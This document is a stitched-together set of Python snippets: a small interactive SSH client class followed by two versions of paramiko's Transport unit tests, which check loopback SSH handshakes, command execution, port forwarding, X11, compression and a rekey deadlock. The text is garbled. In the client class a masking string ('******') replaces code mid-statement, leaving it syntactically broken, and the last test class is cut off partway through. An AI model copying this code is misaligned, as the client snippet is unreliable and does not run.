class Client: def __init__(self, host, mode): self.__mode = mode self.__username, self.__address = list( map(lambda x: x if ':' not in x else (x.split(':')[0], int(x.split(':')[1])), host.split('@'))) self.__password = None self.__session = None self.__transport = Transport(create_connection(self.__address)) def __authenticate(self): self.__password = input(self.__username + '@' + ':'.join([str(x) for x in self.__address]) + '\'s password: '******'vt100', width=10, height=10) self.__session.invoke_shell() def __handler(self): self.__session = self.__transport.open_session() self.__command() def run(self): self.__authenticate()
class TransportTest(ParamikoTest): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server(self, client_options=None, server_options=None): host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=bytes(host_key)) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assert_(not event.isSet()) self.ts.start_server(event, self.server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_1_security_options(self): o = self.tc.get_security_options() self.assertEquals(type(o), SecurityOptions) self.assert_((b'aes256-cbc', b'blowfish-cbc') != o.ciphers) o.ciphers = (b'aes256-cbc', b'blowfish-cbc') self.assertEquals((b'aes256-cbc', b'blowfish-cbc'), o.ciphers) try: o.ciphers = (b'aes256-cbc', b'made-up-cipher') self.assert_(False) except ValueError: pass try: o.ciphers = 23 self.assert_(False) except TypeError: pass def test_2_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929 self.tc.H = unhexlify(b'0C8307CDE6856FF30BA93684EB0F04C2520E9ED3') self.tc.session_id = self.tc.H key = self.tc._compute_key(b'C', 32) self.assertEquals(b'207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995', hexlify(key).upper()) def test_3_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=bytes(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.assertEquals(None, self.tc.get_username()) self.assertEquals(None, self.ts.get_username()) self.assertEquals(False, self.tc.is_authenticated()) self.assertEquals(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) self.assertEquals('slowdive', self.tc.get_username()) self.assertEquals('slowdive', self.ts.get_username()) self.assertEquals(True, self.tc.is_authenticated()) self.assertEquals(True, self.ts.is_authenticated()) def test_3a_long_banner(self): """ verify that a long banner doesn't mess up the handshake. """ host_key = RSAKey.from_private_key_file('tests/test_rsa.key') public_host_key = RSAKey(data=bytes(host_key)) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assert_(not event.isSet()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect(hostkey=public_host_key, username='******', password='******') event.wait(1.0) self.assert_(event.isSet()) self.assert_(self.ts.is_active()) def test_4_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = (b'aes256-cbc',) options.digests = (b'hmac-md5-96',) self.setup_test_server(client_options=force_algorithms) self.assertEquals(b'aes256-cbc', self.tc.local_cipher) self.assertEquals(b'aes256-cbc', self.tc.remote_cipher) self.assertEquals(12, self.tc.packetizer.get_mac_size_out()) self.assertEquals(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) def test_5_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEquals(None, getattr(self.server, '_global_request', None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEquals(b'*****@*****.**', self.server._global_request) def test_6_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command('no') self.assert_(False) except SSHException as x: pass chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send(b'Hello there.\n') schan.send_stderr(b'This is on stderr.\n') schan.close() f = chan.makefile() self.assertEquals(b'Hello there.\n', f.readline()) self.assertEquals(b'', f.readline()) f = chan.makefile_stderr() self.assertEquals(b'This is on stderr.\n', f.readline()) self.assertEquals(b'', f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) schan.send(b'Hello there.\n') schan.send_stderr(b'This is on stderr.\n') schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEquals(b'Hello there.\n', f.readline()) self.assertEquals(b'This is on stderr.\n', f.readline()) self.assertEquals(b'', f.readline()) def test_7_invoke_shell(self): """ verify that invoke_shell() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) chan.send(b'communist j. cat\n') f = schan.makefile() self.assertEquals(b'communist j. cat\n', f.readline()) chan.close() self.assertEquals(b'', f.readline()) def test_8_channel_exception(self): """ verify that ChannelException is thrown for a bad open-channel request. """ self.setup_test_server() try: chan = self.tc.open_channel(b'bogus') self.fail('expected exception') except ChannelException as x: self.assert_(x.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED) def test_9_exit_status(self): """ verify that get_exit_status() works. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) chan.exec_command('yes') schan.send(b'Hello there.\n') self.assert_(not chan.exit_status_ready()) # trigger an EOF schan.shutdown_read() schan.shutdown_write() schan.send_exit_status(23) schan.close() f = chan.makefile() self.assertEquals(b'Hello there.\n', f.readline()) self.assertEquals(b'', f.readline()) count = 0 while not chan.exit_status_ready(): time.sleep(0.1) count += 1 if count > 50: raise Exception("timeout") self.assertEquals(23, chan.recv_exit_status()) chan.close() def test_A_select(self): """ verify that select() on a channel works. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEquals([], r) self.assertEquals([], w) self.assertEquals([], e) schan.send(b'hello\n') # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEquals([chan], r) self.assertEquals([], w) self.assertEquals([], e) self.assertEquals(b'hello\n', chan.recv(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEquals([], r) self.assertEquals([], w) self.assertEquals([], e) schan.close() # detect eof? for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEquals([chan], r) self.assertEquals([], w) self.assertEquals([], e) self.assertEquals(b'', chan.recv(16)) # make sure the pipe is still open for now... p = chan._pipe self.assertEquals(False, p._closed) chan.close() # ...and now is closed. self.assertEquals(True, p._closed) def test_B_renegotiate(self): """ verify that a transport can correctly renegotiate mid-stream. """ self.setup_test_server() self.tc.packetizer.REKEY_BYTES = 16384 chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) self.assertEquals(self.tc.H, self.tc.session_id) for i in range(20): chan.send(b'x' * 1024) chan.close() # allow a few seconds for the rekeying to complete for i in range(50): if self.tc.H != self.tc.session_id: break time.sleep(0.1) self.assertNotEquals(self.tc.H, self.tc.session_id) schan.close() def test_C_compression(self): """ verify that zlib compression is basically working. """ def force_compression(o): o.compression = (b'zlib',) self.setup_test_server(force_compression, force_compression) chan = self.tc.open_session() chan.exec_command(b'yes') schan = self.ts.accept(1.0) bytes = self.tc.packetizer._Packetizer__sent_bytes chan.send(b'x' * 1024) bytes2 = self.tc.packetizer._Packetizer__sent_bytes # tests show this is actually compressed to *52 bytes*! including packet overhead! nice!! :) self.assert_(bytes2 - bytes < 1024) self.assertEquals(52, bytes2 - bytes) chan.close() schan.close() def test_D_x11(self): """ verify that an x11 port can be requested and opened. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command(b'yes') schan = self.ts.accept(1.0) requested = [] def handler(c, addr): requested.append(addr) self.tc._queue_incoming_channel(c) self.assertEquals(None, getattr(self.server, '_x11_screen_number', None)) cookie = chan.request_x11(0, single_connection=True, handler=handler) self.assertEquals(0, self.server._x11_screen_number) self.assertEquals(b'MIT-MAGIC-COOKIE-1', self.server._x11_auth_protocol) self.assertEquals(cookie, self.server._x11_auth_cookie) self.assertEquals(True, self.server._x11_single_connection) x11_server = self.ts.open_x11_channel(('localhost', 6093)) x11_client = self.tc.accept() self.assertEquals('localhost', requested[0][0]) self.assertEquals(6093, requested[0][1]) x11_server.send(b'hello') self.assertEquals(b'hello', x11_client.recv(5)) x11_server.close() x11_client.close() chan.close() schan.close() def test_E_reverse_port_forwarding(self): """ verify that a client can ask the server to open a reverse port for forwarding. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) requested = [] def handler(c, origin_addr, server_addr): requested.append(origin_addr) requested.append(server_addr) self.tc._queue_incoming_channel(c) port = self.tc.request_port_forward('127.0.0.1', 0, handler) self.assertEquals(port, self.server._listen.getsockname()[1]) cs = socket.socket() cs.connect((b'127.0.0.1', port)) ss, _ = self.server._listen.accept() sch = self.ts.open_forwarded_tcpip_channel(ss.getsockname(), ss.getpeername()) cch = self.tc.accept() sch.send(b'hello') self.assertEquals(b'hello', cch.recv(5)) sch.close() cch.close() ss.close() cs.close() # now cancel it. self.tc.cancel_port_forward(b'127.0.0.1', port) self.assertTrue(self.server._listen is None) def test_F_port_forwarding(self): """ verify that a client can forward new connections from a locally- forwarded port. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) # open a port on the "server" that the client will ask to forward to. greeting_server = socket.socket() greeting_server.bind(('127.0.0.1', 0)) greeting_server.listen(1) greeting_port = greeting_server.getsockname()[1] cs = self.tc.open_channel(b'direct-tcpip', ('127.0.0.1', greeting_port), ('', 9000)) sch = self.ts.accept(1.0) cch = socket.socket() cch.connect(self.server._tcpip_dest) ss, _ = greeting_server.accept() ss.send(b'Hello!\n') ss.close() sch.send(cch.recv(8192)) sch.close() self.assertEquals(b'Hello!\n', cs.recv(7)) cs.close() def test_G_stderr_select(self): """ verify that select() on a channel works even if only stderr is receiving data. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEquals([], r) self.assertEquals([], w) self.assertEquals([], e) schan.send_stderr(b'hello\n') # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEquals([chan], r) self.assertEquals([], w) self.assertEquals([], e) self.assertEquals(b'hello\n', chan.recv_stderr(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEquals([], r) self.assertEquals([], w) self.assertEquals([], e) schan.close() chan.close() def test_H_send_ready(self): """ verify that send_ready() indicates when a send would not block. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) self.assertEquals(chan.send_ready(), True) total = 0 K = b'*' * 1024 while total < 1024 * 1024: chan.send(K) total += len(K) if not chan.send_ready(): break self.assert_(total < 1024 * 1024) schan.close() chan.close() self.assertEquals(chan.send_ready(), True) def test_I_rekey_deadlock(self): """ Regression test for deadlock when in-transit messages are received after MSG_KEXINIT is sent Note: When this test fails, it may leak threads. """ # Test for an obscure deadlocking bug that can occur if we receive # certain messages while initiating a key exchange. # # The deadlock occurs as follows: # # In the main thread: # 1. The user's program calls Channel.send(), which sends # MSG_CHANNEL_DATA to the remote host. # 2. Packetizer discovers that REKEY_BYTES has been exceeded, and # sets the __need_rekey flag. # # In the Transport thread: # 3. Packetizer notices that the __need_rekey flag is set, and raises # NeedRekeyException. # 4. In response to NeedRekeyException, the transport thread sends # MSG_KEXINIT to the remote host. # # On the remote host (using any SSH implementation): # 5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST is sent. # 6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is sent. # # In the main thread: # 7. The user's program calls Channel.send(). # 8. Channel.send acquires Channel.lock, then calls Transport._send_user_message(). # 9. Transport._send_user_message waits for Transport.clear_to_send # to be set (i.e., it waits for re-keying to complete). # Channel.lock is still held. # # In the Transport thread: # 10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust # is called to handle it. # 11. Channel._window_adjust tries to acquire Channel.lock, but it # blocks because the lock is already held by the main thread. # # The result is that the Transport thread never processes the remote # host's MSG_KEXINIT packet, because it becomes deadlocked while # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message. # We set up two separate threads for sending and receiving packets, # while the main thread acts as a watchdog timer. If the timer # expires, a deadlock is assumed. class SendThread(threading.Thread): def __init__(self, chan, iterations, done_event): threading.Thread.__init__(self, None, None, self.__class__.__name__) self.setDaemon(True) self.chan = chan self.iterations = iterations self.done_event = done_event self.watchdog_event = threading.Event() self.last = None def run(self): try: for i in range(1, 1+self.iterations): if self.done_event.isSet(): break self.watchdog_event.set() #print i, "SEND" self.chan.send(b"x" * 2048) finally: self.done_event.set() self.watchdog_event.set() class ReceiveThread(threading.Thread): def __init__(self, chan, done_event): threading.Thread.__init__(self, None, None, self.__class__.__name__) self.setDaemon(True) self.chan = chan self.done_event = done_event self.watchdog_event = threading.Event() def run(self): try: while not self.done_event.isSet(): if self.chan.recv_ready(): chan.recv(65536) self.watchdog_event.set() else: if random.randint(0, 1): time.sleep(random.randint(0, 500) / 1000.0) finally: self.done_event.set() self.watchdog_event.set() self.setup_test_server() self.ts.packetizer.REKEY_BYTES = 2048 chan = self.tc.open_session() chan.exec_command('yes') schan = self.ts.accept(1.0) # Monkey patch the client's Transport._handler_table so that the client # sends MSG_CHANNEL_WINDOW_ADJUST whenever it receives an initial # MSG_KEXINIT. This is used to simulate the effect of network latency # on a real MSG_CHANNEL_WINDOW_ADJUST message. self.tc._handler_table = self.tc._handler_table.copy() # copy per-class dictionary _negotiate_keys = self.tc._handler_table[MSG_KEXINIT] def _negotiate_keys_wrapper(self, m): if self.local_kex_init is None: # Remote side sent KEXINIT # Simulate in-transit MSG_CHANNEL_WINDOW_ADJUST by sending it # before responding to the incoming MSG_KEXINIT. m2 = Message() m2.add_byte(chr(MSG_CHANNEL_WINDOW_ADJUST).encode()) m2.add_int(chan.remote_chanid) m2.add_int(1) # bytes to add self._send_message(m2) return _negotiate_keys(self, m) self.tc._handler_table[MSG_KEXINIT] = _negotiate_keys_wrapper # Parameters for the test iterations = 500 # The deadlock does not happen every time, but it # should after many iterations. timeout = 5 # This event is set when the test is completed done_event = threading.Event() # Start the sending thread st = SendThread(schan, iterations, done_event) st.start() # Start the receiving thread rt = ReceiveThread(chan, done_event) rt.start() # Act as a watchdog timer, checking deadlocked = False while not deadlocked and not done_event.isSet(): for event in (st.watchdog_event, rt.watchdog_event): event.wait(timeout) if done_event.isSet(): break if not event.isSet(): deadlocked = True break event.clear() # Tell the threads to stop (if they haven't already stopped). Note # that if one or more threads are deadlocked, they might hang around # forever (until the process exits). done_event.set() # Assertion: We must not have detected a timeout. self.assertFalse(deadlocked) # Close the channels schan.close() chan.close()
class TransportTest(unittest.TestCase): def setUp(self): self.socks = LoopSocket() self.sockc = LoopSocket() self.sockc.link(self.socks) self.tc = Transport(self.sockc) self.ts = Transport(self.socks) def tearDown(self): self.tc.close() self.ts.close() self.socks.close() self.sockc.close() def setup_test_server( self, client_options=None, server_options=None, connect_kwargs=None ): host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) if client_options is not None: client_options(self.tc.get_security_options()) if server_options is not None: server_options(self.ts.get_security_options()) event = threading.Event() self.server = NullServer() self.assertTrue(not event.is_set()) self.ts.start_server(event, self.server) if connect_kwargs is None: connect_kwargs = dict( hostkey=public_host_key, username="******", password="******", ) self.tc.connect(**connect_kwargs) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_security_options(self): o = self.tc.get_security_options() self.assertEqual(type(o), SecurityOptions) self.assertTrue(("aes256-cbc", "blowfish-cbc") != o.ciphers) o.ciphers = ("aes256-cbc", "blowfish-cbc") self.assertEqual(("aes256-cbc", "blowfish-cbc"), o.ciphers) try: o.ciphers = ("aes256-cbc", "made-up-cipher") self.assertTrue(False) except ValueError: pass try: o.ciphers = 23 self.assertTrue(False) except TypeError: pass def testb_security_options_reset(self): o = self.tc.get_security_options() # should not throw any exceptions o.ciphers = o.ciphers o.digests = o.digests o.key_types = o.key_types o.kex = o.kex o.compression = o.compression def test_compute_key(self): self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929 # noqa self.tc.H = b"\x0C\x83\x07\xCD\xE6\x85\x6F\xF3\x0B\xA9\x36\x84\xEB\x0F\x04\xC2\x52\x0E\x9E\xD3" # noqa self.tc.session_id = self.tc.H key = self.tc._compute_key("C", 32) self.assertEqual( b"207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995", # noqa hexlify(key).upper(), ) def test_simple(self): """ verify that we can establish an ssh link with ourselves across the loopback sockets. this is hardly "simple" but it's simpler than the later tests. :) """ host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.assertEqual(None, self.tc.get_username()) self.assertEqual(None, self.ts.get_username()) self.assertEqual(False, self.tc.is_authenticated()) self.assertEqual(False, self.ts.is_authenticated()) self.ts.start_server(event, server) self.tc.connect( hostkey=public_host_key, username="******", password="******" ) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) self.assertEqual("slowdive", self.tc.get_username()) self.assertEqual("slowdive", self.ts.get_username()) self.assertEqual(True, self.tc.is_authenticated()) self.assertEqual(True, self.ts.is_authenticated()) def testa_long_banner(self): """ verify that a long banner doesn't mess up the handshake. """ host_key = RSAKey.from_private_key_file(_support("test_rsa.key")) public_host_key = RSAKey(data=host_key.asbytes()) self.ts.add_server_key(host_key) event = threading.Event() server = NullServer() self.assertTrue(not event.is_set()) self.socks.send(LONG_BANNER) self.ts.start_server(event, server) self.tc.connect( hostkey=public_host_key, username="******", password="******" ) event.wait(1.0) self.assertTrue(event.is_set()) self.assertTrue(self.ts.is_active()) def test_special(self): """ verify that the client can demand odd handshake settings, and can renegotiate keys in mid-stream. """ def force_algorithms(options): options.ciphers = ("aes256-cbc",) options.digests = ("hmac-md5-96",) self.setup_test_server(client_options=force_algorithms) self.assertEqual("aes256-cbc", self.tc.local_cipher) self.assertEqual("aes256-cbc", self.tc.remote_cipher) self.assertEqual(12, self.tc.packetizer.get_mac_size_out()) self.assertEqual(12, self.tc.packetizer.get_mac_size_in()) self.tc.send_ignore(1024) self.tc.renegotiate_keys() self.ts.send_ignore(1024) @slow def test_keepalive(self): """ verify that the keepalive will be sent. """ self.setup_test_server() self.assertEqual(None, getattr(self.server, "_global_request", None)) self.tc.set_keepalive(1) time.sleep(2) self.assertEqual("*****@*****.**", self.server._global_request) def test_exec_command(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) try: chan.exec_command( b"command contains \xfc and is not a valid UTF-8 string" ) self.assertTrue(False) except SSHException: pass chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) schan.send("Hello there.\n") schan.send_stderr("This is on stderr.\n") schan.close() f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("", f.readline()) f = chan.makefile_stderr() self.assertEqual("This is on stderr.\n", f.readline()) self.assertEqual("", f.readline()) # now try it with combined stdout/stderr chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) schan.send("Hello there.\n") schan.send_stderr("This is on stderr.\n") schan.close() chan.set_combine_stderr(True) f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("This is on stderr.\n", f.readline()) self.assertEqual("", f.readline()) def testa_channel_can_be_used_as_context_manager(self): """ verify that exec_command() does something reasonable. """ self.setup_test_server() with self.tc.open_session() as chan: with self.ts.accept(1.0) as schan: chan.exec_command("yes") schan.send("Hello there.\n") schan.close() f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("", f.readline()) def test_invoke_shell(self): """ verify that invoke_shell() does something reasonable. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) chan.send("communist j. cat\n") f = schan.makefile() self.assertEqual("communist j. cat\n", f.readline()) chan.close() self.assertEqual("", f.readline()) def test_channel_exception(self): """ verify that ChannelException is thrown for a bad open-channel request. """ self.setup_test_server() try: self.tc.open_channel("bogus") self.fail("expected exception") except ChannelException as e: self.assertTrue(e.code == OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED) def test_exit_status(self): """ verify that get_exit_status() works. """ self.setup_test_server() chan = self.tc.open_session() schan = self.ts.accept(1.0) chan.exec_command("yes") schan.send("Hello there.\n") self.assertTrue(not chan.exit_status_ready()) # trigger an EOF schan.shutdown_read() schan.shutdown_write() schan.send_exit_status(23) schan.close() f = chan.makefile() self.assertEqual("Hello there.\n", f.readline()) self.assertEqual("", f.readline()) count = 0 while not chan.exit_status_ready(): time.sleep(0.1) count += 1 if count > 50: raise Exception("timeout") self.assertEqual(23, chan.recv_exit_status()) chan.close() def test_select(self): """ verify that select() on a channel works. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send("hello\n") # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b"hello\n", chan.recv(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() # detect eof? for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(bytes(), chan.recv(16)) # make sure the pipe is still open for now... p = chan._pipe self.assertEqual(False, p._closed) chan.close() # ...and now is closed. self.assertEqual(True, p._closed) def test_renegotiate(self): """ verify that a transport can correctly renegotiate mid-stream. """ self.setup_test_server() self.tc.packetizer.REKEY_BYTES = 16384 chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) self.assertEqual(self.tc.H, self.tc.session_id) for i in range(20): chan.send("x" * 1024) chan.close() # allow a few seconds for the rekeying to complete for i in range(50): if self.tc.H != self.tc.session_id: break time.sleep(0.1) self.assertNotEqual(self.tc.H, self.tc.session_id) schan.close() def test_compression(self): """ verify that zlib compression is basically working. """ def force_compression(o): o.compression = ("zlib",) self.setup_test_server(force_compression, force_compression) chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) bytes = self.tc.packetizer._Packetizer__sent_bytes chan.send("x" * 1024) bytes2 = self.tc.packetizer._Packetizer__sent_bytes block_size = self.tc._cipher_info[self.tc.local_cipher]["block-size"] mac_size = self.tc._mac_info[self.tc.local_mac]["size"] # tests show this is actually compressed to *52 bytes*! including # packet overhead! nice!! :) self.assertTrue(bytes2 - bytes < 1024) self.assertEqual(16 + block_size + mac_size, bytes2 - bytes) chan.close() schan.close() def test_x11(self): """ verify that an x11 port can be requested and opened. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command("yes") schan = self.ts.accept(1.0) requested = [] def handler(c, addr_port): addr, port = addr_port requested.append((addr, port)) self.tc._queue_incoming_channel(c) self.assertEqual( None, getattr(self.server, "_x11_screen_number", None) ) cookie = chan.request_x11(0, single_connection=True, handler=handler) self.assertEqual(0, self.server._x11_screen_number) self.assertEqual("MIT-MAGIC-COOKIE-1", self.server._x11_auth_protocol) self.assertEqual(cookie, self.server._x11_auth_cookie) self.assertEqual(True, self.server._x11_single_connection) x11_server = self.ts.open_x11_channel(("localhost", 6093)) x11_client = self.tc.accept() self.assertEqual("localhost", requested[0][0]) self.assertEqual(6093, requested[0][1]) x11_server.send("hello") self.assertEqual(b"hello", x11_client.recv(5)) x11_server.close() x11_client.close() chan.close() schan.close() def test_reverse_port_forwarding(self): """ verify that a client can ask the server to open a reverse port for forwarding. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command("yes") self.ts.accept(1.0) requested = [] def handler(c, origin_addr_port, server_addr_port): requested.append(origin_addr_port) requested.append(server_addr_port) self.tc._queue_incoming_channel(c) port = self.tc.request_port_forward("127.0.0.1", 0, handler) self.assertEqual(port, self.server._listen.getsockname()[1]) cs = socket.socket() cs.connect(("127.0.0.1", port)) ss, _ = self.server._listen.accept() sch = self.ts.open_forwarded_tcpip_channel( ss.getsockname(), ss.getpeername() ) cch = self.tc.accept() sch.send("hello") self.assertEqual(b"hello", cch.recv(5)) sch.close() cch.close() ss.close() cs.close() # now cancel it. self.tc.cancel_port_forward("127.0.0.1", port) self.assertTrue(self.server._listen is None) def test_port_forwarding(self): """ verify that a client can forward new connections from a locally- forwarded port. """ self.setup_test_server() chan = self.tc.open_session() chan.exec_command("yes") self.ts.accept(1.0) # open a port on the "server" that the client will ask to forward to. greeting_server = socket.socket() greeting_server.bind(("127.0.0.1", 0)) greeting_server.listen(1) greeting_port = greeting_server.getsockname()[1] cs = self.tc.open_channel( "direct-tcpip", ("127.0.0.1", greeting_port), ("", 9000) ) sch = self.ts.accept(1.0) cch = socket.socket() cch.connect(self.server._tcpip_dest) ss, _ = greeting_server.accept() ss.send(b"Hello!\n") ss.close() sch.send(cch.recv(8192)) sch.close() self.assertEqual(b"Hello!\n", cs.recv(7)) cs.close() def test_stderr_select(self): """ verify that select() on a channel works even if only stderr is receiving data. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) # nothing should be ready r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.send_stderr("hello\n") # something should be ready now (give it 1 second to appear) for i in range(10): r, w, e = select.select([chan], [], [], 0.1) if chan in r: break time.sleep(0.1) self.assertEqual([chan], r) self.assertEqual([], w) self.assertEqual([], e) self.assertEqual(b"hello\n", chan.recv_stderr(6)) # and, should be dead again now r, w, e = select.select([chan], [], [], 0.1) self.assertEqual([], r) self.assertEqual([], w) self.assertEqual([], e) schan.close() chan.close() def test_send_ready(self): """ verify that send_ready() indicates when a send would not block. """ self.setup_test_server() chan = self.tc.open_session() chan.invoke_shell() schan = self.ts.accept(1.0) self.assertEqual(chan.send_ready(), True) total = 0 K = "*" * 1024 limit = 1 + (64 * 2 ** 15) while total < limit: chan.send(K) total += len(K) if not chan.send_ready(): break self.assertTrue(total < limit) schan.close() chan.close() self.assertEqual(chan.send_ready(), True) def test_rekey_deadlock(self): """ Regression test for deadlock when in-transit messages are received after MSG_KEXINIT is sent Note: When this test fails, it may leak threads. """ # Test for an obscure deadlocking bug that can occur if we receive # certain messages while initiating a key exchange. # # The deadlock occurs as follows: # # In the main thread: # 1. The user's program calls Channel.send(), which sends # MSG_CHANNEL_DATA to the remote host. # 2. Packetizer discovers that REKEY_BYTES has been exceeded, and # sets the __need_rekey flag. # # In the Transport thread: # 3. Packetizer notices that the __need_rekey flag is set, and raises # NeedRekeyException. # 4. In response to NeedRekeyException, the transport thread sends # MSG_KEXINIT to the remote host. # # On the remote host (using any SSH implementation): # 5. The MSG_CHANNEL_DATA is received, and MSG_CHANNEL_WINDOW_ADJUST # is sent. # 6. The MSG_KEXINIT is received, and a corresponding MSG_KEXINIT is # sent. # # In the main thread: # 7. The user's program calls Channel.send(). # 8. Channel.send acquires Channel.lock, then calls # Transport._send_user_message(). # 9. Transport._send_user_message waits for Transport.clear_to_send # to be set (i.e., it waits for re-keying to complete). # Channel.lock is still held. # # In the Transport thread: # 10. MSG_CHANNEL_WINDOW_ADJUST is received; Channel._window_adjust # is called to handle it. # 11. Channel._window_adjust tries to acquire Channel.lock, but it # blocks because the lock is already held by the main thread. # # The result is that the Transport thread never processes the remote # host's MSG_KEXINIT packet, because it becomes deadlocked while # handling the preceding MSG_CHANNEL_WINDOW_ADJUST message. # We set up two separate threads for sending and receiving packets, # while the main thread acts as a watchdog timer. If the timer # expires, a deadlock is assumed. class SendThread(threading.Thread): def __init__(self, chan, iterations, done_event): threading.Thread.__init__( self, None, None, self.__class__.__name__ ) self.setDaemon(True) self.chan = chan self.iterations = iterations self.done_event = done_event self.watchdog_event = threading.Event() self.last = None def run(self): try: for i in range(1, 1 + self.iterations): if self.done_event.is_set(): break self.watchdog_event.set() # print i, "SEND" self.chan.send("x" * 2048) finally: self.done_event.set() self.watchdog_event.set() class ReceiveThread(threading.Thread): def __init__(self, chan, done_event): threading.Thread.__init__( self, None, None, self.__class__.__name__ ) self.setDaemon(True) self.chan = chan self.done_event = done_event 